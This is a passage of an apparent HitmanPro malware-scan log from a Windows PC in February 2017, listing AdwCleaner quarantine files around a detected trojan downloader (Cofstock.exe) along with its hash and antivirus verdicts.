          5.0s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.3s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.7s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.2s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.4s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.3s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
      Size . . . . . . . : 27.136 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 5.9
      SHA-256  . . . . . : EA7702197F353023091C654CE9D54CE8DB169B874D9C948A0D34CD9BF1FD2397
    > Bitdefender  . . . : Gen:Variant.MSILPerseus.34918
    > Kaspersky  . . . . : Trojan-Downloader.MSIL.Agent.alqa
    > HitmanPro  . . . . : Troj/MSIL-HOX
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.8s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.6s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.6s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.6s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.5s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.0s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.5s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.5s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
